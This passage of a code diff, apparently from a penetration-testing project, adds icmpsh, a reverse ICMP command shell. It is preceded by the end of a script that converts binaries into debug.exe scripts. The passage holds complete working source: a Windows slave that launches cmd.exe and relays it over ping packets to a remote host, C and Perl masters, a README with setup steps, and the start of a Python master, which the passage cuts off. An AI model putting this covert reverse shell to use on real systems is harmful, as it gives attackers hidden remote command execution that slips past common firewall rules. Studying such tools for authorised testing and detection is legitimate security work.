unsignedFileChar = struct.unpack("B", fileChar)[0]
|
||||||
|
|
||||||
|
if unsignedFileChar != 0:
|
||||||
|
counter2 += 1
|
||||||
|
|
||||||
|
if not scrString:
|
||||||
|
scrString = "e %0x %02x" % (counter, unsignedFileChar)
|
||||||
|
else:
|
||||||
|
scrString += " %02x" % unsignedFileChar
|
||||||
|
elif scrString:
|
||||||
|
script += "%s\n" % scrString
|
||||||
|
scrString = ""
|
||||||
|
counter2 = 0
|
||||||
|
|
||||||
|
counter += 1
|
||||||
|
|
||||||
|
if counter2 == 20:
|
||||||
|
script += "%s\n" % scrString
|
||||||
|
scrString = ""
|
||||||
|
counter2 = 0
|
||||||
|
|
||||||
|
script += "w\nq\n"
|
||||||
|
|
||||||
|
return script
|
||||||
|
|
||||||
|
def main(inputFile, outputFile):
|
||||||
|
if not os.path.isfile(inputFile):
|
||||||
|
print "ERROR: the provided input file '%s' is not a regular file" % inputFile
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
script = convert(inputFile)
|
||||||
|
|
||||||
|
if outputFile:
|
||||||
|
fpOut = open(outputFile, "w")
|
||||||
|
sys.stdout = fpOut
|
||||||
|
sys.stdout.write(script)
|
||||||
|
sys.stdout.close()
|
||||||
|
else:
|
||||||
|
print script
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
|
||||||
|
parser = OptionParser(usage=usage, version="0.1")
|
||||||
|
|
||||||
|
try:
|
||||||
|
parser.add_option("-i", dest="inputFile", help="Input binary file")
|
||||||
|
|
||||||
|
parser.add_option("-o", dest="outputFile", help="Output debug.exe text file")
|
||||||
|
|
||||||
|
(args, _) = parser.parse_args()
|
||||||
|
|
||||||
|
if not args.inputFile:
|
||||||
|
parser.error("Missing the input file, -h for help")
|
||||||
|
|
||||||
|
except (OptionError, TypeError), e:
|
||||||
|
parser.error(e)
|
||||||
|
|
||||||
|
inputFile = args.inputFile
|
||||||
|
outputFile = args.outputFile
|
||||||
|
|
||||||
|
main(inputFile, outputFile)
|
||||||
45
extra/icmpsh/README.txt
Normal file
45
extra/icmpsh/README.txt
Normal file
@@ -0,0 +1,45 @@
|
|||||||
|
icmpsh - simple reverse ICMP shell
|
||||||
|
|
||||||
|
icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl.
|
||||||
|
|
||||||
|
|
||||||
|
--- Running the Master ---
|
||||||
|
|
||||||
|
The master is straight forward to use. There are no extra libraries required for the C version.
|
||||||
|
The Perl master however has the following dependencies:
|
||||||
|
|
||||||
|
* IO::Socket
|
||||||
|
* NetPacket::IP
|
||||||
|
* NetPacket::ICMP
|
||||||
|
|
||||||
|
|
||||||
|
When running the master, don't forget to disable ICMP replies by the OS. For example:
|
||||||
|
|
||||||
|
sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
||||||
|
|
||||||
|
If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
|
||||||
|
commands send from the master.
|
||||||
|
|
||||||
|
|
||||||
|
--- Running the Slave ---
|
||||||
|
|
||||||
|
The slave comes with a few command line options as outlined below:
|
||||||
|
|
||||||
|
|
||||||
|
-t host host ip address to send ping requests to. This option is mandatory!
|
||||||
|
|
||||||
|
-r send a single test icmp request containing the string "Test1234" and then quit.
|
||||||
|
This is for testing the connection.
|
||||||
|
|
||||||
|
-d milliseconds delay between requests in milliseconds
|
||||||
|
|
||||||
|
-o milliseconds timeout of responses in milliseconds. If a response has not received in time,
|
||||||
|
the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
|
||||||
|
The counter is set back to 0 if a response was received.
|
||||||
|
|
||||||
|
-b num limit of blanks (unanswered icmp requests before quitting
|
||||||
|
|
||||||
|
-s bytes maximal data buffer size in bytes
|
||||||
|
|
||||||
|
|
||||||
|
In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.
|
||||||
22
extra/icmpsh/__init__.py
Normal file
22
extra/icmpsh/__init__.py
Normal file
@@ -0,0 +1,22 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
#
|
||||||
|
# icmpsh - simple icmp command shell (port of icmpsh-m.pl written in
|
||||||
|
# Perl by Nico Leidecker <nico@leidecker.info>)
|
||||||
|
#
|
||||||
|
# Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
|
pass
|
||||||
134
extra/icmpsh/icmpsh-m.c
Normal file
134
extra/icmpsh/icmpsh-m.c
Normal file
@@ -0,0 +1,134 @@
|
|||||||
|
/*
|
||||||
|
* icmpsh - simple icmp command shell
|
||||||
|
* Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
|
||||||
|
* This program is free software: you can redistribute it and/or modify
|
||||||
|
* it under the terms of the GNU General Public License as published by
|
||||||
|
* the Free Software Foundation, either version 3 of the License, or
|
||||||
|
* (at your option) any later version.
|
||||||
|
*
|
||||||
|
* This program is distributed in the hope that it will be useful,
|
||||||
|
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
* GNU General Public License for more details.
|
||||||
|
*
|
||||||
|
* You should have received a copy of the GNU General Public License
|
||||||
|
* along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <sys/socket.h>
|
||||||
|
#include <sys/stat.h>
|
||||||
|
#include <netinet/in.h>
|
||||||
|
#include <netinet/ip_icmp.h>
|
||||||
|
#include <netinet/ip.h>
|
||||||
|
#include <string.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <fcntl.h>
|
||||||
|
|
||||||
|
#define IN_BUF_SIZE 1024
|
||||||
|
#define OUT_BUF_SIZE 64
|
||||||
|
|
||||||
|
// calculate checksum
|
||||||
|
unsigned short checksum(unsigned short *ptr, int nbytes)
|
||||||
|
{
|
||||||
|
unsigned long sum;
|
||||||
|
unsigned short oddbyte, rs;
|
||||||
|
|
||||||
|
sum = 0;
|
||||||
|
while(nbytes > 1) {
|
||||||
|
sum += *ptr++;
|
||||||
|
nbytes -= 2;
|
||||||
|
}
|
||||||
|
|
||||||
|
if(nbytes == 1) {
|
||||||
|
oddbyte = 0;
|
||||||
|
*((unsigned char *) &oddbyte) = *(u_char *)ptr;
|
||||||
|
sum += oddbyte;
|
||||||
|
}
|
||||||
|
|
||||||
|
sum = (sum >> 16) + (sum & 0xffff);
|
||||||
|
sum += (sum >> 16);
|
||||||
|
rs = ~sum;
|
||||||
|
return rs;
|
||||||
|
}
|
||||||
|
|
||||||
|
int main(int argc, char **argv)
|
||||||
|
{
|
||||||
|
int sockfd;
|
||||||
|
int flags;
|
||||||
|
char in_buf[IN_BUF_SIZE];
|
||||||
|
char out_buf[OUT_BUF_SIZE];
|
||||||
|
unsigned int out_size;
|
||||||
|
int nbytes;
|
||||||
|
struct iphdr *ip;
|
||||||
|
struct icmphdr *icmp;
|
||||||
|
char *data;
|
||||||
|
struct sockaddr_in addr;
|
||||||
|
|
||||||
|
|
||||||
|
printf("icmpsh - master\n");
|
||||||
|
|
||||||
|
// create raw ICMP socket
|
||||||
|
sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
|
||||||
|
if (sockfd == -1) {
|
||||||
|
perror("socket");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// set stdin to non-blocking
|
||||||
|
flags = fcntl(0, F_GETFL, 0);
|
||||||
|
flags |= O_NONBLOCK;
|
||||||
|
fcntl(0, F_SETFL, flags);
|
||||||
|
|
||||||
|
printf("running...\n");
|
||||||
|
while(1) {
|
||||||
|
|
||||||
|
// read data from socket
|
||||||
|
memset(in_buf, 0x00, IN_BUF_SIZE);
|
||||||
|
nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1);
|
||||||
|
if (nbytes > 0) {
|
||||||
|
// get ip and icmp header and data part
|
||||||
|
ip = (struct iphdr *) in_buf;
|
||||||
|
if (nbytes > sizeof(struct iphdr)) {
|
||||||
|
nbytes -= sizeof(struct iphdr);
|
||||||
|
icmp = (struct icmphdr *) (ip + 1);
|
||||||
|
if (nbytes > sizeof(struct icmphdr)) {
|
||||||
|
nbytes -= sizeof(struct icmphdr);
|
||||||
|
data = (char *) (icmp + 1);
|
||||||
|
data[nbytes] = '\0';
|
||||||
|
printf("%s", data);
|
||||||
|
fflush(stdout);
|
||||||
|
}
|
||||||
|
|
||||||
|
// reuse headers
|
||||||
|
icmp->type = 0;
|
||||||
|
addr.sin_family = AF_INET;
|
||||||
|
addr.sin_addr.s_addr = ip->saddr;
|
||||||
|
|
||||||
|
// read data from stdin
|
||||||
|
nbytes = read(0, out_buf, OUT_BUF_SIZE);
|
||||||
|
if (nbytes > -1) {
|
||||||
|
memcpy((char *) (icmp + 1), out_buf, nbytes);
|
||||||
|
out_size = nbytes;
|
||||||
|
} else {
|
||||||
|
out_size = 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
icmp->checksum = 0x00;
|
||||||
|
icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size);
|
||||||
|
|
||||||
|
// send reply
|
||||||
|
nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr));
|
||||||
|
if (nbytes == -1) {
|
||||||
|
perror("sendto");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
62
extra/icmpsh/icmpsh-m.pl
Executable file
62
extra/icmpsh/icmpsh-m.pl
Executable file
@@ -0,0 +1,62 @@
|
|||||||
|
#!/usr/bin/env perl
|
||||||
|
#
|
||||||
|
# icmpsh - simple icmp command shell
|
||||||
|
# Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
#
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
use strict;
|
||||||
|
use IO::Socket;
|
||||||
|
use NetPacket::IP;
|
||||||
|
use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
|
||||||
|
use Net::RawIP;
|
||||||
|
use Fcntl;
|
||||||
|
|
||||||
|
print "icmpsh - master\n";
|
||||||
|
|
||||||
|
# create raw socket
|
||||||
|
my $sock = IO::Socket::INET->new(
|
||||||
|
Proto => "ICMP",
|
||||||
|
Type => SOCK_RAW,
|
||||||
|
Blocking => 1) or die "$!";
|
||||||
|
|
||||||
|
# set stdin to non-blocking
|
||||||
|
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
|
||||||
|
|
||||||
|
print "running...\n";
|
||||||
|
|
||||||
|
my $input = '';
|
||||||
|
while(1) {
|
||||||
|
if ($sock->recv(my $buffer, 4096, 0)) {
|
||||||
|
my $ip = NetPacket::IP->decode($buffer);
|
||||||
|
my $icmp = NetPacket::ICMP->decode($ip->{data});
|
||||||
|
if ($icmp->{type} == ICMP_ECHO) {
|
||||||
|
# get identifier and sequencenumber
|
||||||
|
my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
|
||||||
|
|
||||||
|
# write data to stdout and read from stdin
|
||||||
|
print $data;
|
||||||
|
$input = <STDIN>;
|
||||||
|
|
||||||
|
# compile and send response
|
||||||
|
$icmp->{type} = ICMP_ECHOREPLY;
|
||||||
|
$icmp->{data} = pack("SSa*", $ident, $seq, $input);
|
||||||
|
my $raw = $icmp->encode();
|
||||||
|
my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
|
||||||
|
$sock->send($raw, 0, $addr) or die "$!\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
344
extra/icmpsh/icmpsh-s.c
Normal file
344
extra/icmpsh/icmpsh-s.c
Normal file
@@ -0,0 +1,344 @@
|
|||||||
|
/*
|
||||||
|
* icmpsh - simple icmp command shell
|
||||||
|
* Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
|
||||||
|
* This program is free software: you can redistribute it and/or modify
|
||||||
|
* it under the terms of the GNU General Public License as published by
|
||||||
|
* the Free Software Foundation, either version 3 of the License, or
|
||||||
|
* (at your option) any later version.
|
||||||
|
*
|
||||||
|
* This program is distributed in the hope that it will be useful,
|
||||||
|
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
* GNU General Public License for more details.
|
||||||
|
*
|
||||||
|
* You should have received a copy of the GNU General Public License
|
||||||
|
* along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
*/
|
||||||
|
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <winsock2.h>
|
||||||
|
#include <windows.h>
|
||||||
|
#include <winsock2.h>
|
||||||
|
#include <iphlpapi.h>
|
||||||
|
|
||||||
|
#define ICMP_HEADERS_SIZE (sizeof(ICMP_ECHO_REPLY) + 8)
|
||||||
|
|
||||||
|
#define STATUS_OK 0
|
||||||
|
#define STATUS_SINGLE 1
|
||||||
|
#define STATUS_PROCESS_NOT_CREATED 2
|
||||||
|
|
||||||
|
#define TRANSFER_SUCCESS 1
|
||||||
|
#define TRANSFER_FAILURE 0
|
||||||
|
|
||||||
|
#define DEFAULT_TIMEOUT 3000
|
||||||
|
#define DEFAULT_DELAY 200
|
||||||
|
#define DEFAULT_MAX_BLANKS 10
|
||||||
|
#define DEFAULT_MAX_DATA_SIZE 64
|
||||||
|
|
||||||
|
FARPROC icmp_create, icmp_send, to_ip;
|
||||||
|
|
||||||
|
int verbose = 0;
|
||||||
|
|
||||||
|
int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write)
|
||||||
|
{
|
||||||
|
SECURITY_ATTRIBUTES sattr;
|
||||||
|
STARTUPINFOA si;
|
||||||
|
HANDLE in_read, out_write;
|
||||||
|
|
||||||
|
memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES));
|
||||||
|
memset(pi, 0x00, sizeof(PROCESS_INFORMATION));
|
||||||
|
|
||||||
|
// create communication pipes
|
||||||
|
memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES));
|
||||||
|
sattr.nLength = sizeof(SECURITY_ATTRIBUTES);
|
||||||
|
sattr.bInheritHandle = TRUE;
|
||||||
|
sattr.lpSecurityDescriptor = NULL;
|
||||||
|
|
||||||
|
if (!CreatePipe(out_read, &out_write, &sattr, 0)) {
|
||||||
|
return STATUS_PROCESS_NOT_CREATED;
|
||||||
|
}
|
||||||
|
if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) {
|
||||||
|
return STATUS_PROCESS_NOT_CREATED;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!CreatePipe(&in_read, in_write, &sattr, 0)) {
|
||||||
|
return STATUS_PROCESS_NOT_CREATED;
|
||||||
|
}
|
||||||
|
if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) {
|
||||||
|
return STATUS_PROCESS_NOT_CREATED;
|
||||||
|
}
|
||||||
|
|
||||||
|
// spawn process
|
||||||
|
memset(&si, 0x00, sizeof(STARTUPINFO));
|
||||||
|
si.cb = sizeof(STARTUPINFO);
|
||||||
|
si.hStdError = out_write;
|
||||||
|
si.hStdOutput = out_write;
|
||||||
|
si.hStdInput = in_read;
|
||||||
|
si.dwFlags |= STARTF_USESTDHANDLES;
|
||||||
|
|
||||||
|
if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) {
|
||||||
|
return STATUS_PROCESS_NOT_CREATED;
|
||||||
|
}
|
||||||
|
|
||||||
|
CloseHandle(out_write);
|
||||||
|
CloseHandle(in_read);
|
||||||
|
|
||||||
|
return STATUS_OK;
|
||||||
|
}
|
||||||
|
|
||||||
|
void usage(char *path)
|
||||||
|
{
|
||||||
|
printf("%s [options] -t target\n", path);
|
||||||
|
printf("options:\n");
|
||||||
|
printf(" -t host host ip address to send ping requests to\n");
|
||||||
|
printf(" -r send a single test icmp request and then quit\n");
|
||||||
|
printf(" -d milliseconds delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY);
|
||||||
|
printf(" -o milliseconds timeout in milliseconds\n");
|
||||||
|
printf(" -h this screen\n");
|
||||||
|
printf(" -b num maximal number of blanks (unanswered icmp requests)\n");
|
||||||
|
printf(" before quitting\n");
|
||||||
|
printf(" -s bytes maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
|
||||||
|
printf("In order to improve the speed, lower the delay (-d) between requests or\n");
|
||||||
|
printf("increase the size (-s) of the data buffer\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
void create_icmp_channel(HANDLE *icmp_chan)
|
||||||
|
{
|
||||||
|
// create icmp file
|
||||||
|
*icmp_chan = (HANDLE) icmp_create();
|
||||||
|
}
|
||||||
|
|
||||||
|
int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout)
|
||||||
|
{
|
||||||
|
int rs;
|
||||||
|
char *temp_in_buf;
|
||||||
|
int nbytes;
|
||||||
|
|
||||||
|
PICMP_ECHO_REPLY echo_reply;
|
||||||
|
|
||||||
|
temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE);
|
||||||
|
if (!temp_in_buf) {
|
||||||
|
return TRANSFER_FAILURE;
|
||||||
|
}
|
||||||
|
|
||||||
|
// send data to remote host
|
||||||
|
rs = icmp_send(
|
||||||
|
icmp_chan,
|
||||||
|
target,
|
||||||
|
out_buf,
|
||||||
|
out_buf_size,
|
||||||
|
NULL,
|
||||||
|
temp_in_buf,
|
||||||
|
max_in_data_size + ICMP_HEADERS_SIZE,
|
||||||
|
timeout);
|
||||||
|
|
||||||
|
// check received data
|
||||||
|
if (rs > 0) {
|
||||||
|
echo_reply = (PICMP_ECHO_REPLY) temp_in_buf;
|
||||||
|
if (echo_reply->DataSize > max_in_data_size) {
|
||||||
|
nbytes = max_in_data_size;
|
||||||
|
} else {
|
||||||
|
nbytes = echo_reply->DataSize;
|
||||||
|
}
|
||||||
|
memcpy(in_buf, echo_reply->Data, nbytes);
|
||||||
|
*in_buf_size = nbytes;
|
||||||
|
|
||||||
|
free(temp_in_buf);
|
||||||
|
return TRANSFER_SUCCESS;
|
||||||
|
}
|
||||||
|
|
||||||
|
free(temp_in_buf);
|
||||||
|
|
||||||
|
return TRANSFER_FAILURE;
|
||||||
|
}
|
||||||
|
|
||||||
|
int load_deps()
|
||||||
|
{
|
||||||
|
HMODULE lib;
|
||||||
|
|
||||||
|
lib = LoadLibraryA("ws2_32.dll");
|
||||||
|
if (lib != NULL) {
|
||||||
|
to_ip = GetProcAddress(lib, "inet_addr");
|
||||||
|
if (!to_ip) {
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
lib = LoadLibraryA("iphlpapi.dll");
|
||||||
|
if (lib != NULL) {
|
||||||
|
icmp_create = GetProcAddress(lib, "IcmpCreateFile");
|
||||||
|
icmp_send = GetProcAddress(lib, "IcmpSendEcho");
|
||||||
|
if (icmp_create && icmp_send) {
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
lib = LoadLibraryA("ICMP.DLL");
|
||||||
|
if (lib != NULL) {
|
||||||
|
icmp_create = GetProcAddress(lib, "IcmpCreateFile");
|
||||||
|
icmp_send = GetProcAddress(lib, "IcmpSendEcho");
|
||||||
|
if (icmp_create && icmp_send) {
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("failed to load functions (%u)", GetLastError());
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
int main(int argc, char **argv)
|
||||||
|
{
|
||||||
|
int opt;
|
||||||
|
char *target;
|
||||||
|
unsigned int delay, timeout;
|
||||||
|
unsigned int ip_addr;
|
||||||
|
HANDLE pipe_read, pipe_write;
|
||||||
|
HANDLE icmp_chan;
|
||||||
|
unsigned char *in_buf, *out_buf;
|
||||||
|
unsigned int in_buf_size, out_buf_size;
|
||||||
|
DWORD rs;
|
||||||
|
int blanks, max_blanks;
|
||||||
|
PROCESS_INFORMATION pi;
|
||||||
|
int status;
|
||||||
|
unsigned int max_data_size;
|
||||||
|
|
||||||
|
// set defaults
|
||||||
|
target = 0;
|
||||||
|
timeout = DEFAULT_TIMEOUT;
|
||||||
|
delay = DEFAULT_DELAY;
|
||||||
|
max_blanks = DEFAULT_MAX_BLANKS;
|
||||||
|
max_data_size = DEFAULT_MAX_DATA_SIZE;
|
||||||
|
|
||||||
|
status = STATUS_OK;
|
||||||
|
if (!load_deps()) {
|
||||||
|
printf("failed to load ICMP library\n");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// parse command line options
|
||||||
|
for (opt = 1; opt < argc; opt++) {
|
||||||
|
if (argv[opt][0] == '-') {
|
||||||
|
switch(argv[opt][1]) {
|
||||||
|
case 'h':
|
||||||
|
usage(*argv);
|
||||||
|
return 0;
|
||||||
|
case 't':
|
||||||
|
if (opt + 1 < argc) {
|
||||||
|
target = argv[opt + 1];
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case 'd':
|
||||||
|
if (opt + 1 < argc) {
|
||||||
|
delay = atol(argv[opt + 1]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case 'o':
|
||||||
|
if (opt + 1 < argc) {
|
||||||
|
timeout = atol(argv[opt + 1]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case 'r':
|
||||||
|
status = STATUS_SINGLE;
|
||||||
|
break;
|
||||||
|
case 'b':
|
||||||
|
if (opt + 1 < argc) {
|
||||||
|
max_blanks = atol(argv[opt + 1]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case 's':
|
||||||
|
if (opt + 1 < argc) {
|
||||||
|
max_data_size = atol(argv[opt + 1]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
default:
|
||||||
|
printf("unrecognized option -%c\n", argv[1][0]);
|
||||||
|
usage(*argv);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!target) {
|
||||||
|
printf("you need to specify a host with -t. Try -h for more options\n");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
ip_addr = to_ip(target);
|
||||||
|
|
||||||
|
// don't spawn a shell if we're only sending a single test request
|
||||||
|
if (status != STATUS_SINGLE) {
|
||||||
|
status = spawn_shell(&pi, &pipe_read, &pipe_write);
|
||||||
|
}
|
||||||
|
|
||||||
|
// create icmp channel
|
||||||
|
create_icmp_channel(&icmp_chan);
|
||||||
|
if (icmp_chan == INVALID_HANDLE_VALUE) {
|
||||||
|
printf("unable to create ICMP file: %u\n", GetLastError());
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// allocate transfer buffers
|
||||||
|
in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);
|
||||||
|
out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);
|
||||||
|
if (!in_buf || !out_buf) {
|
||||||
|
printf("failed to allocate memory for transfer buffers\n");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);
|
||||||
|
memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);
|
||||||
|
|
||||||
|
// sending/receiving loop
|
||||||
|
blanks = 0;
|
||||||
|
do {
|
||||||
|
|
||||||
|
switch(status) {
|
||||||
|
case STATUS_SINGLE:
|
||||||
|
// reply with a static string
|
||||||
|
out_buf_size = sprintf(out_buf, "Test1234\n");
|
||||||
|
break;
|
||||||
|
case STATUS_PROCESS_NOT_CREATED:
|
||||||
|
// reply with error message
|
||||||
|
out_buf_size = sprintf(out_buf, "Process was not created\n");
|
||||||
|
break;
|
||||||
|
default:
|
||||||
|
// read data from process via pipe
|
||||||
|
out_buf_size = 0;
|
||||||
|
if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) {
|
||||||
|
if (out_buf_size > 0) {
|
||||||
|
out_buf_size = 0;
|
||||||
|
rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL);
|
||||||
|
if (!rs && GetLastError() != ERROR_IO_PENDING) {
|
||||||
|
out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError());
|
||||||
|
}
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError());
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
// send request/receive response
|
||||||
|
if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size, max_data_size, timeout) == TRANSFER_SUCCESS) {
|
||||||
|
if (status == STATUS_OK) {
|
||||||
|
// write data from response back into pipe
|
||||||
|
WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0);
|
||||||
|
}
|
||||||
|
blanks = 0;
|
||||||
|
} else {
|
||||||
|
// no reply received or error occured
|
||||||
|
blanks++;
|
||||||
|
}
|
||||||
|
|
||||||
|
// wait between requests
|
||||||
|
Sleep(delay);
|
||||||
|
|
||||||
|
} while (status == STATUS_OK && blanks < max_blanks);
|
||||||
|
|
||||||
|
if (status == STATUS_OK) {
|
||||||
|
TerminateProcess(pi.hProcess, 0);
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
BIN
extra/icmpsh/icmpsh.exe_
Normal file
BIN
extra/icmpsh/icmpsh.exe_
Normal file
Binary file not shown.
138
extra/icmpsh/icmpsh_m.py
Normal file
138
extra/icmpsh/icmpsh_m.py
Normal file
@@ -0,0 +1,138 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
#
|
||||||
|
# icmpsh - simple icmp command shell (port of icmpsh-m.pl written in
|
||||||
|
# Perl by Nico Leidecker <nico@leidecker.info>)
|
||||||
|
#
|
||||||
|
# Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
|
import os
|
||||||
|
import select
|
||||||
|
import socket
|
||||||
|
import subprocess
|
||||||
|
import sys
|
||||||
|
|
||||||
|
def setNonBlocking(fd):
|
||||||
|
"""
|
||||||
|
Make a file descriptor non-blocking
|
||||||
|
"""
|
||||||
|
|
||||||
|
import fcntl
|
||||||
|
|
||||||
|
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
|
||||||
|
flags = flags | os.O_NONBLOCK
|
||||||
|
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
|
||||||
|
|
||||||
|
def main(src, dst):
|
||||||
|
if subprocess.mswindows:
|
||||||
|
sys.stderr.write('icmpsh master can only run on Posix systems\n')
|
||||||
|
sys.exit(255)
|
||||||
|
|
||||||
|
try:
|
||||||
|
from impacket import ImpactDecoder
|
||||||
|
from impacket import ImpactPacket
|
||||||
|
except ImportError:
|
||||||
|
sys.stderr.write('You need to install Python Impacket library first\n')
|
||||||
|
sys.exit(255)
|
||||||
|
|
||||||
|
# Make standard input a non-blocking file
|
||||||
|
stdin_fd = sys.stdin.fileno()
|
||||||
|
setNonBlocking(stdin_fd)
|
||||||
|
|
||||||
|
# Open one socket for ICMP protocol
|
||||||
|
# A special option is set on the socket so that IP headers are included
|
